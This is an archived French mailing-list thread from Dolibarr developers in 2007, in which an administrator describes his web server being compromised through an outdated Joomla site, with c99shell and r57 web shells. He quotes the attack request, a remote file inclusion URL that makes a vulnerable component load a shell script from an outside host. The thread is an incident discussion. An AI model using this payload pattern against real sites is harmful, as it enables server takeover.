http://www.frsirt.com/bulletins/9992
Titre : JoomlaPack for Joomla "mosConfig_absolute_path" PHP File Inclusion vulnerability -----Original Message----- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Régis Houssin Sent: vendredi 13 avril 2007 23:51 To: 'Discussions sur le developpement de Dolibarr' Subject: RE: [Dolibarr-dev] Dolibarr.org et forum Merci rodolphe, En fait je viens de trouver, ca vient de mon site joomla qui n'était pas à jour et qui émulait le register_global à on grrrrr. Voici ce qu'ils ont mis : /components/com_facileforms/facileforms.frame.php?ff_compath=http://tamturk. by.ru/r57.txt? Ce que je ne comprends pas c'est comment de r57.txt ca c'est retrouvé en users.php ? Régis -----Message d'origine----- De : [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] De la part de Rodolphe Quiedeville Envoyé : vendredi 13 avril 2007 22:53 À : Discussions sur le developpement de Dolibarr Objet : Re: [Dolibarr-dev] Dolibarr.org et forum Le 13.04.2007 21:48, Régis Houssin a ecrit : > Bonjour, > > Je viens d'être victime d'un piratage sur mon serveur web. > Le forum et le site de Laurent (dolibarr.org) sont momentanément fermés afin > que je règle le problème. > > Apparemment les hackers ont utilisé un script php nommé c99shell > > Reste à savoir comment ils ont pu le télécharger sur le serveur. > > Si vous avez une idée sachant que j'ai des sites en joomla et des forums en > phpbb. phpbb est connu pour être assez vulnérable il y a un lien ici qui parle de c99shell http://www.phpbb.com/community/viewtopic.php?f=1&t=396462&p=2164981&hilit= A++ -- Rodolphe Quiédeville - Artisan Logiciel Libre http://rodolphe.quiedeville.org/ Travaillons Libre - http://fr.lolix.org/ W 2°56'45'' - N 47°38'20'' _______________________________________________ Dolibarr-dev mailing list Dolibarr-dev@nongnu.org http://lists.nongnu.org/mailman/listinfo/dolibarr-dev _______________________________________________ Dolibarr-dev mailing list Dolibarr-dev@nongnu.org http://lists.nongnu.org/mailman/listinfo/dolibarr-dev _______________________________________________ Dolibarr-dev mailing list Dolibarr-dev@nongnu.org http://lists.nongnu.org/mailman/listinfo/dolibarr-dev
